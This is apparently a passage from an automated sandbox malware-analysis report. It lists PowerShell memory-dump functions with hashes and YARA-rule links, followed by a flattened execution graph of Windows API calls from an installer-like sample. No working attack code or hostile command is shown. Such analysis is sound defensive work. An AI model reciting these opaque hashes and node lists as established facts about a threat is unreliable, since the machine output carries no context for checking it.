                                                                                                                                                                                                                                                                              • Instruction ID: 2828c830a31c7c6504ef6df4a327cdeb015070ffe5daa1b187e3528e6f370823
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8d2c45179fe95dbb68229596caa4235fdcb41fa4ed976d09f45c7adb65a89629
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6A518197A0FBD61EE7539A3868F50D53FA0DF5326971A10F7C2D4CE093ED0C644AA222
                                                                                                                                                                                                                                                                              Function 00007FFD346A4445 Relevance: .8, Instructions: 827COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2243436438.00007FFD346A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346A0000, based on PE: false
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffd346a0000_powershell.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                              • Opcode ID: cb3c590e39a345daa7ddb9fb0c34a1a348ed73f958681345964488f3d97c8f8d
                                                                                                                                                                                                                                                                              • Instruction ID: 95eebb0682dd11f8bcf79113c3807b7ceaa32671b43d5ae0caa841935b067392
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cb3c590e39a345daa7ddb9fb0c34a1a348ed73f958681345964488f3d97c8f8d
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2132DB87B0FAE10BE35556ACBC651E96F90DFC327D70841B7D2C8DA1879C0C9C4A9396
                                                                                                                                                                                                                                                                              Function 00007FFD34774AF6 Relevance: .4, Instructions: 364COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2244055635.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffd34770000_powershell.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                              • Opcode ID: fdbb2aff9ca8d4fccfbf2fbc7d69c89962ca28637db2b46d3b64195c8092e9c1
                                                                                                                                                                                                                                                                              • Instruction ID: 44f9af912b118b933bcf45b704466812668e2f724ff98b4bee29cb0aae11c4d0
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fdbb2aff9ca8d4fccfbf2fbc7d69c89962ca28637db2b46d3b64195c8092e9c1
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F9B1E35260EBC64FE797977848B52B47FE1AF43220B4941FBC1C9CB0A3D94DA80AD352
                                                                                                                                                                                                                                                                              Function 00007FFD346A72FB Relevance: .3, Instructions: 257COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2243436438.00007FFD346A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346A0000, based on PE: false
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffd346a0000_powershell.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                              • Opcode ID: 270d9504c46da30961d7d4365ba67c9a76b49431c593b08bbe6eadd2c54d628e
                                                                                                                                                                                                                                                                              • Instruction ID: 15111e3a425bff963bcf4fb9375e52484169b1e4c4a15843bdfbf02a1c1d6cb9
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 270d9504c46da30961d7d4365ba67c9a76b49431c593b08bbe6eadd2c54d628e
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DB618497B0EBE25BE2A2556C1CF60E67F90DF5327670900B7C684C70D3AD0DA84762A1
                                                                                                                                                                                                                                                                              Function 00007FFD346AB0FA Relevance: .2, Instructions: 217COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2243436438.00007FFD346A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346A0000, based on PE: false
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffd346a0000_powershell.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                              • Opcode ID: 4fa9c067c914e44c798ea8e80b281233f16507eae43bab1d64d23f8eeafd419c
                                                                                                                                                                                                                                                                              • Instruction ID: e258044ed441e5a4b822f6f023d0f86273dd1158724e6fb69f865bb4b9660ce0
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4fa9c067c914e44c798ea8e80b281233f16507eae43bab1d64d23f8eeafd419c
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6B71C662A0E6A24FD752DA6CDCFA0EA7B94DF5322D70D41BBC284CF097ED1C14069296
                                                                                                                                                                                                                                                                              Function 00007FFD346ABBF3 Relevance: .2, Instructions: 160COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2243436438.00007FFD346A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346A0000, based on PE: false
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffd346a0000_powershell.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                              • Opcode ID: e8da394c80ece7ed7c2165155158606664f23069ac140887574b4f6b91e3d29c
                                                                                                                                                                                                                                                                              • Instruction ID: 0536bfb715c1092bfd3e68bfabdd385233e44f4289bbb67637278dd30f5875a0
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e8da394c80ece7ed7c2165155158606664f23069ac140887574b4f6b91e3d29c
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C24198B261EBE64FE6668E2D58F64E57BD0DF1322470900BEC395CB493DE096407A242
                                                                                                                                                                                                                                                                              Function 00007FFD346A8EFA Relevance: .1, Instructions: 112COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2243436438.00007FFD346A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346A0000, based on PE: false
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffd346a0000_powershell.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                              • Opcode ID: 2c7679c250ed372fdfa6e1370379b596d1803207ee670fbeb7960362856b894e
                                                                                                                                                                                                                                                                              • Instruction ID: debcdc8fc143792852b6a89bde14b4c3b04cfc646435fc287bb44144864bc434
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2c7679c250ed372fdfa6e1370379b596d1803207ee670fbeb7960362856b894e
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 32318893A0EAE30FE7534A2D9CB61D67F94EF533A4B0950B7C688CB083DD1D14069356

                                                                                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                                                                                              Function 00007FFD3477078D Relevance: .3, Instructions: 327COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 00000009.00000002.2492850621.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34770000_powershell.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                              • Opcode ID: 2ab40a1c2b59f2abb518fc7f09916990591a38f57a4a7445d8dd869428672b68
                                                                                                                                                                                                                                                                              • Instruction ID: c5f1c1b511386eb6fd7b603409d6a34f80db3968b4c3271791b1fda87e84b525
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2ab40a1c2b59f2abb518fc7f09916990591a38f57a4a7445d8dd869428672b68
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B8912562B0DACA4FFB9996289CB61B57BD0EF97310B8440BAD24DC31D3DD59B80297C1
                                                                                                                                                                                                                                                                              Function 00007FFD347708C6 Relevance: .1, Instructions: 74COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 00000009.00000002.2492850621.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34770000_powershell.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                              • Opcode ID: 38919e76880bb0778d82a9446de60bdde3bf30a50ba83808999e09b8cb4a9291
                                                                                                                                                                                                                                                                              • Instruction ID: 752418378f504a506d5bef63147b70fdc8029d5f1c0e708e520f52f24d04649f
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 38919e76880bb0778d82a9446de60bdde3bf30a50ba83808999e09b8cb4a9291
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 18110AA2B0DA868BF758965858F51B976C1EF46314B84407ED34DC31D3DD1DF8009681
                                                                                                                                                                                                                                                                              Function 00007FFD346A33B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 00000009.00000002.2492241743.00007FFD346A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346A0000, based on PE: false
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_7ffd346a0000_powershell.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                              • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                                                                                              • Instruction ID: 24aef6e58671a62f14222a864d5608cc4645e75a5eb2213a00036e05fa3ae6e9
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1401677121CB0C4FD784EF0CE451AA5B7E0FB95364F10056DE58AC3651DA36E882CB45

                                                                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                                                                              Execution Coverage:18.8%
                                                                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                              Signature Coverage:16.6%
                                                                                                                                                                                                                                                                              Total number of Nodes:1481
                                                                                                                                                                                                                                                                              Total number of Limit Nodes:28
                                                                                                                                                                                                                                                                              execution_graph 4200 402fc0 4201 401446 18 API calls 4200->4201 4202 402fc7 4201->4202 4203 401a13 4202->4203 4204 403017 4202->4204 4205 40300a 4202->4205 4207 406831 18 API calls 4204->4207 4206 401446 18 API calls 4205->4206 4206->4203 4207->4203 4208 4023c1 4209 40145c 18 API calls 4208->4209 4210 4023c8 4209->4210 4213 407296 4210->4213 4216 406efe CreateFileW 4213->4216 4217 406f30 4216->4217 4218 406f4a ReadFile 4216->4218 4219 4062cf 11 API calls 4217->4219 4220 4023d6 4218->4220 4223 406fb0 4218->4223 4219->4220 4221 406fc7 ReadFile lstrcpynA lstrcmpA 4221->4223 4224 40700e SetFilePointer ReadFile 4221->4224 4222 40720f CloseHandle 4222->4220 4223->4220 4223->4221 4223->4222 4225 407009 4223->4225 4224->4222 4226 4070d4 ReadFile 4224->4226 4225->4222 4227 407164 4226->4227 4227->4225 4227->4226 4228 40718b SetFilePointer GlobalAlloc ReadFile 4227->4228 4229 4071eb lstrcpynW GlobalFree 4228->4229 4230 4071cf 4228->4230 4229->4222 4230->4229 4230->4230 4231 401cc3 4232 40145c 18 API calls 4231->4232 4233 401cca lstrlenW 4232->4233 4234 4030dc 4233->4234 4235 4030e3 4234->4235 4237 405f7d wsprintfW 4234->4237 4237->4235 4238 401c46 4239 40145c 18 API calls 4238->4239 4240 401c4c 4239->4240 4241 4062cf 11 API calls 4240->4241 4242 401c59 4241->4242 4243 406cc7 81 API calls 4242->4243 4244 401c64 4243->4244 4245 403049 4246 401446 18 API calls 4245->4246 4247 403050 4246->4247 4248 406831 18 API calls 4247->4248 4249 401a13 4247->4249 4248->4249 4250 40204a 4251 401446 18 API calls 4250->4251 4252 402051 IsWindow 4251->4252 4253 4018d3 4252->4253 4254 40324c 4255 403277 4254->4255 4256 40325e SetTimer 4254->4256 4257 4032cc 4255->4257 4258 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4255->4258 4256->4255 4258->4257 4259 4022cc 4260 40145c 18 API calls 4259->4260 4261 4022d3 4260->4261 4262 406301 2 API calls 4261->4262 4263 4022d9 4262->4263 4265 4022e8 4263->4265 4268 405f7d wsprintfW 4263->4268 4266 4030e3 4265->4266 4269 405f7d wsprintfW 4265->4269 4268->4265 4269->4266 4270 4030cf 4271 40145c 18 API calls 4270->4271 4272 4030d6 4271->4272 4274 4030dc 4272->4274 4277 4063d8 GlobalAlloc lstrlenW 4272->4277 4275 4030e3 4274->4275 4304 405f7d wsprintfW 4274->4304 4278 406460 4277->4278 4279 40640e 4277->4279 4278->4274 4280 40643b GetVersionExW 4279->4280 4305 406057 CharUpperW 4279->4305 4280->4278 4281 40646a 4280->4281 4282 406490 LoadLibraryA 4281->4282 4283 406479 4281->4283 4282->4278 4286 4064ae GetProcAddress GetProcAddress GetProcAddress 4282->4286 4283->4278 4285 4065b1 GlobalFree 4283->4285 4287 4065c7 LoadLibraryA 4285->4287 4288 406709 FreeLibrary 4285->4288 4289 406621 4286->4289 4293 4064d6 4286->4293 4287->4278 4291 4065e1 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4287->4291 4288->4278 4290 40667d FreeLibrary 4289->4290 4292 406656 4289->4292 4290->4292 4291->4289 4296 406716 4292->4296 4301 4066b1 lstrcmpW 4292->4301 4302 4066e2 CloseHandle 4292->4302 4303 406700 CloseHandle 4292->4303 4293->4289 4294 406516 4293->4294 4295 4064fa FreeLibrary GlobalFree 4293->4295 4294->4285 4297 406528 lstrcpyW OpenProcess 4294->4297 4299 40657b CloseHandle CharUpperW lstrcmpW 4294->4299 4295->4278 4298 40671b CloseHandle FreeLibrary 4296->4298 4297->4294 4297->4299 4300 406730 CloseHandle 4298->4300 4299->4289 4299->4294 4300->4298 4301->4292 4301->4300 4302->4292 4303->4288 4304->4275 4305->4279 4306 4044d1 4307 40450b 4306->4307 4308 40453e 4306->4308 4374 405cb0 GetDlgItemTextW 4307->4374 4309 40454b GetDlgItem GetAsyncKeyState 4308->4309 4313 4045dd 4308->4313 4311 40456a GetDlgItem 4309->4311 4324 404588 4309->4324 4316 403d6b 19 API calls 4311->4316 4312 4046c9 4372 40485f 4312->4372 4376 405cb0 GetDlgItemTextW 4312->4376 4313->4312 4321 406831 18 API calls 4313->4321 4313->4372 4314 404516 4315 406064 5 API calls 4314->4315 4317 40451c 4315->4317 4319 40457d ShowWindow 4316->4319 4320 403ea0 5 API calls 4317->4320 4319->4324 4325 404521 GetDlgItem 4320->4325 4326 40465b SHBrowseForFolderW 4321->4326 4322 4046f5 4327 4067aa 18 API calls 4322->4327 4323 403df6 8 API calls 4328 404873 4323->4328 4329 4045a5 SetWindowTextW 4324->4329 4333 405d85 4 API calls 4324->4333 4330 40452f IsDlgButtonChecked 4325->4330 4325->4372 4326->4312 4332 404673 CoTaskMemFree 4326->4332 4337 4046fb 4327->4337 4331 403d6b 19 API calls 4329->4331 4330->4308 4335 4045c3 4331->4335 4336 40674e 3 API calls 4332->4336 4334 40459b 4333->4334 4334->4329 4341 40674e 3 API calls 4334->4341 4338 403d6b 19 API calls 4335->4338 4339 404680 4336->4339 4377 406035 lstrcpynW 4337->4377 4342 4045ce 4338->4342 4343 4046b7 SetDlgItemTextW 4339->4343 4348 406831 18 API calls 4339->4348 4341->4329 4375 403dc4 SendMessageW 4342->4375 4343->4312 4344 404712 4346 406328 3 API calls 4344->4346 4355 40471a 4346->4355 4347 4045d6 4349 406328 3 API calls 4347->4349 4350 40469f lstrcmpiW 4348->4350 4349->4313 4350->4343 4353 4046b0 lstrcatW 4350->4353 4351 40475c 4378 406035 lstrcpynW 4351->4378 4353->4343 4354 404765 4356 405d85 4 API calls 4354->4356 4355->4351 4359 40677d 2 API calls 4355->4359 4361 4047b1 4355->4361 4357 40476b GetDiskFreeSpaceW 4356->4357 4360 40478f MulDiv 4357->4360 4357->4361 4359->4355 4360->4361 4362 40480e 4361->4362 4379 4043d9 4361->4379 4363 404831 4362->4363 4365 40141d 80 API calls 4362->4365 4387 403db1 KiUserCallbackDispatcher 4363->4387 4365->4363 4366 4047ff 4368 404810 SetDlgItemTextW 4366->4368 4369 404804 4366->4369 4368->4362 4371 4043d9 21 API calls 4369->4371 4370 40484d 4370->4372 4388 403d8d 4370->4388 4371->4362 4372->4323 4374->4314 4375->4347 4376->4322 4377->4344 4378->4354 4380 4043f9 4379->4380 4381 406831 18 API calls 4380->4381 4382 404439 4381->4382 4383 406831 18 API calls 4382->4383 4384 404444 4383->4384 4385 406831 18 API calls 4384->4385 4386 404454 lstrlenW wsprintfW SetDlgItemTextW 4385->4386 4386->4366 4387->4370 4389 403da0 SendMessageW 4388->4389 4390 403d9b 4388->4390 4389->4372 4390->4389 4391 401dd3 4392 401446 18 API calls 4391->4392 4393 401dda 4392->4393 4394 401446 18 API calls 4393->4394 4395 4018d3 4394->4395 4396 402e55 4397 40145c 18 API calls 4396->4397 4398 402e63 4397->4398 4399 402e79 4398->4399 4400 40145c 18 API calls 4398->4400 4401 405e5c 2 API calls 4399->4401 4400->4399 4402 402e7f 4401->4402 4426 405e7c GetFileAttributesW CreateFileW 4402->4426 4404 402e8c 4405 402f35 4404->4405 4406 402e98 GlobalAlloc 4404->4406 4409 4062cf 11 API calls 4405->4409 4407 402eb1 4406->4407 4408 402f2c CloseHandle 4406->4408 4427 403368 SetFilePointer 4407->4427 4408->4405 4411 402f45 4409->4411 4413 402f50 DeleteFileW 4411->4413 4414 402f63 4411->4414 4412 402eb7 4415 403336 ReadFile 4412->4415 4413->4414 4428 401435 4414->4428 4417 402ec0 GlobalAlloc 4415->4417 4418 402ed0 4417->4418 4419 402f04 WriteFile GlobalFree 4417->4419 4421 40337f 33 API calls 4418->4421 4420 40337f 33 API calls 4419->4420 4422 402f29 4420->4422 4425 402edd 4421->4425 4422->4408 4424 402efb GlobalFree 4424->4419 4425->4424 4426->4404 4427->4412 4429 404f9e 25 API calls 4428->4429 4430 401443 4429->4430 4431 401cd5 4432 401446 18 API calls 4431->4432 4433 401cdd 4432->4433 4434 401446 18 API calls 4433->4434 4435 401ce8 4434->4435 4436 40145c 18 API calls 4435->4436 4437 401cf1 4436->4437 4438 401d07 lstrlenW 4437->4438 4439 401d43 4437->4439 4440 401d11 4438->4440 4440->4439 4444 406035 lstrcpynW 4440->4444 4442 401d2c 4442->4439 4443 401d39 lstrlenW 4442->4443 4443->4439 4444->4442 4445 402cd7 4446 401446 18 API calls 4445->4446 4448 402c64 4446->4448 4447 402d17 ReadFile 4447->4448 4448->4445 4448->4447 4449 402d99 4448->4449 4450 402dd8 4451 4030e3 4450->4451 4452 402ddf 4450->4452 4453 402de5 FindClose 4452->4453 4453->4451 4454 401d5c 4455 40145c 18 API calls 4454->4455 4456 401d63 4455->4456 4457 40145c 18 API calls 4456->4457 4458 401d6c 4457->4458 4459 401d73 lstrcmpiW 4458->4459 4460 401d86 lstrcmpW 4458->4460 4461 401d79 4459->4461 4460->4461 4462 401c99 4460->4462 4461->4460 4461->4462 4463 4027e3 4464 4027e9 4463->4464 4465 4027f2 4464->4465 4466 402836 4464->4466 4479 401553 4465->4479 4467 40145c 18 API calls 4466->4467 4469 40283d 4467->4469 4471 4062cf 11 API calls 4469->4471 4470 4027f9 4472 40145c 18 API calls 4470->4472 4476 401a13 4470->4476 4473 40284d 4471->4473 4474 40280a RegDeleteValueW 4472->4474 4483 40149d RegOpenKeyExW 4473->4483 4475 4062cf 11 API calls 4474->4475 4478 40282a RegCloseKey 4475->4478 4478->4476 4480 401563 4479->4480 4481 40145c 18 API calls 4480->4481 4482 401589 RegOpenKeyExW 4481->4482 4482->4470 4486 4014c9 4483->4486 4491 401515 4483->4491 4484 4014ef RegEnumKeyW 4485 401501 RegCloseKey 4484->4485 4484->4486 4488 406328 3 API calls 4485->4488 4486->4484 4486->4485 4487 401526 RegCloseKey 4486->4487 4489 40149d 3 API calls 4486->4489 4487->4491 4490 401511 4488->4490 4489->4486 4490->4491 4492 401541 RegDeleteKeyW 4490->4492 4491->4476 4492->4491 4493 4040e4 4494 4040ff 4493->4494 4500 40422d 4493->4500 4496 40413a 4494->4496 4524 403ff6 WideCharToMultiByte 4494->4524 4495 404298 4497 40436a 4495->4497 4498 4042a2 GetDlgItem 4495->4498 4504 403d6b 19 API calls 4496->4504 4505 403df6 8 API calls 4497->4505 4501 40432b 4498->4501 4502 4042bc 4498->4502 4500->4495 4500->4497 4503 404267 GetDlgItem SendMessageW 4500->4503 4501->4497 4506 40433d 4501->4506 4502->4501 4510 4042e2 6 API calls 4502->4510 4529 403db1 KiUserCallbackDispatcher 4503->4529 4508 40417a 4504->4508 4509 404365 4505->4509 4511 404353 4506->4511 4512 404343 SendMessageW 4506->4512 4514 403d6b 19 API calls 4508->4514 4510->4501 4511->4509 4515 404359 SendMessageW 4511->4515 4512->4511 4513 404293 4516 403d8d SendMessageW 4513->4516 4517 404187 CheckDlgButton 4514->4517 4515->4509 4516->4495 4527 403db1 KiUserCallbackDispatcher 4517->4527 4519 4041a5 GetDlgItem 4528 403dc4 SendMessageW 4519->4528 4521 4041bb SendMessageW 4522 4041e1 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4521->4522 4523 4041d8 GetSysColor 4521->4523 4522->4509 4523->4522 4525 404033 4524->4525 4526 404015 GlobalAlloc WideCharToMultiByte 4524->4526 4525->4496 4526->4525 4527->4519 4528->4521 4529->4513 4530 402ae4 4531 402aeb 4530->4531 4532 4030e3 4530->4532 4533 402af2 CloseHandle 4531->4533 4533->4532 4534 402065 4535 401446 18 API calls 4534->4535 4536 40206d 4535->4536 4537 401446 18 API calls 4536->4537 4538 402076 GetDlgItem 4537->4538 4539 4030dc 4538->4539 4540 4030e3 4539->4540 4542 405f7d wsprintfW 4539->4542 4542->4540 4543 402665 4544 40145c 18 API calls 4543->4544 4545 40266b 4544->4545 4546 40145c 18 API calls 4545->4546 4547 402674 4546->4547 4548 40145c 18 API calls 4547->4548 4549 40267d 4548->4549 4550 4062cf 11 API calls 4549->4550 4551 40268c 4550->4551 4552 406301 2 API calls 4551->4552 4553 402695 4552->4553 4554 4026a6 lstrlenW lstrlenW 4553->4554 4556 404f9e 25 API calls 4553->4556 4558 4030e3 4553->4558 4555 404f9e 25 API calls 4554->4555 4557 4026e8 SHFileOperationW 4555->4557 4556->4553 4557->4553 4557->4558 4559 401c69 4560 40145c 18 API calls 4559->4560 4561 401c70 4560->4561 4562 4062cf 11 API calls 4561->4562 4563 401c80 4562->4563 4564 405ccc MessageBoxIndirectW 4563->4564 4565 401a13 4564->4565 4566 402f6e 4567 402f72 4566->4567 4568 402fae 4566->4568 4570 4062cf 11 API calls 4567->4570 4569 40145c 18 API calls 4568->4569 4576 402f9d 4569->4576 4571 402f7d 4570->4571 4572 4062cf 11 API calls 4571->4572 4573 402f90 4572->4573 4574 402fa2 4573->4574 4575 402f98 4573->4575 4578 406113 9 API calls 4574->4578 4577 403ea0 5 API calls 4575->4577 4577->4576 4578->4576 4579 4023f0 4580 402403 4579->4580 4581 4024da 4579->4581 4582 40145c 18 API calls 4580->4582 4583 404f9e 25 API calls 4581->4583 4584 40240a 4582->4584 4587 4024f1 4583->4587 4585 40145c 18 API calls 4584->4585 4586 402413 4585->4586 4588 402429 LoadLibraryExW 4586->4588 4589 40241b GetModuleHandleW 4586->4589 4590 4024ce 4588->4590 4591 40243e 4588->4591 4589->4588 4589->4591 4593 404f9e 25 API calls 4590->4593 4603 406391 GlobalAlloc WideCharToMultiByte 4591->4603 4593->4581 4594 402449 4595 40248c 4594->4595 4596 40244f 4594->4596 4597 404f9e 25 API calls 4595->4597 4598 401435 25 API calls 4596->4598 4601 40245f 4596->4601 4599 402496 4597->4599 4598->4601 4600 4062cf 11 API calls 4599->4600 4600->4601 4601->4587 4602 4024c0 FreeLibrary 4601->4602 4602->4587 4604 4063c9 GlobalFree 4603->4604 4605 4063bc GetProcAddress 4603->4605 4604->4594 4605->4604 3416 402175 3426 401446 3416->3426 3418 40217c 3419 401446 18 API calls 3418->3419 3420 402186 3419->3420 3421 402197 3420->3421 3424 4062cf 11 API calls 3420->3424 3422 4021aa EnableWindow 3421->3422 3423 40219f ShowWindow 3421->3423 3425 4030e3 3422->3425 3423->3425 3424->3421 3427 406831 18 API calls 3426->3427 3428 401455 3427->3428 3428->3418 4606 4048f8 4607 404906 4606->4607 4608 40491d 4606->4608 4609 40490c 4607->4609 4624 404986 4607->4624 4610 40492b IsWindowVisible 4608->4610 4616 404942 4608->4616 4611 403ddb SendMessageW 4609->4611 4613 404938 4610->4613 4610->4624 4614 404916 4611->4614 4612 40498c CallWindowProcW 4612->4614 4625 40487a SendMessageW 4613->4625 4616->4612 4630 406035 lstrcpynW 4616->4630 4618 404971 4631 405f7d wsprintfW 4618->4631 4620 404978 4621 40141d 80 API calls 4620->4621 4622 40497f 4621->4622 4632 406035 lstrcpynW 4622->4632 4624->4612 4626 4048d7 SendMessageW 4625->4626 4627 40489d GetMessagePos ScreenToClient SendMessageW 4625->4627 4629 4048cf 4626->4629 4628 4048d4 4627->4628 4627->4629 4628->4626 4629->4616 4630->4618 4631->4620 4632->4624 3721 4050f9 3722 4052c1 3721->3722 3723 40511a GetDlgItem GetDlgItem GetDlgItem 3721->3723 3724 4052f2 3722->3724 3725 4052ca GetDlgItem CreateThread CloseHandle 3722->3725 3770 403dc4 SendMessageW 3723->3770 3727 405320 3724->3727 3729 405342 3724->3729 3730 40530c ShowWindow ShowWindow 3724->3730 3725->3724 3773 405073 OleInitialize 3725->3773 3731 40537e 3727->3731 3733 405331 3727->3733 3734 405357 ShowWindow 3727->3734 3728 40518e 3740 406831 18 API calls 3728->3740 3735 403df6 8 API calls 3729->3735 3772 403dc4 SendMessageW 3730->3772 3731->3729 3736 405389 SendMessageW 3731->3736 3737 403d44 SendMessageW 3733->3737 3738 405377 3734->3738 3739 405369 3734->3739 3745 4052ba 3735->3745 3744 4053a2 CreatePopupMenu 3736->3744 3736->3745 3737->3729 3743 403d44 SendMessageW 3738->3743 3741 404f9e 25 API calls 3739->3741 3742 4051ad 3740->3742 3741->3738 3746 4062cf 11 API calls 3742->3746 3743->3731 3747 406831 18 API calls 3744->3747 3748 4051b8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3746->3748 3749 4053b2 AppendMenuW 3747->3749 3750 405203 SendMessageW SendMessageW 3748->3750 3751 40521f 3748->3751 3752 4053c5 GetWindowRect 3749->3752 3753 4053d8 3749->3753 3750->3751 3754 405232 3751->3754 3755 405224 SendMessageW 3751->3755 3756 4053df TrackPopupMenu 3752->3756 3753->3756 3757 403d6b 19 API calls 3754->3757 3755->3754 3756->3745 3758 4053fd 3756->3758 3759 405242 3757->3759 3760 405419 SendMessageW 3758->3760 3761 40524b ShowWindow 3759->3761 3762 40527f GetDlgItem SendMessageW 3759->3762 3760->3760 3763 405436 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3760->3763 3764 405261 ShowWindow 3761->3764 3765 40526e 3761->3765 3762->3745 3766 4052a2 SendMessageW SendMessageW 3762->3766 3767 40545b SendMessageW 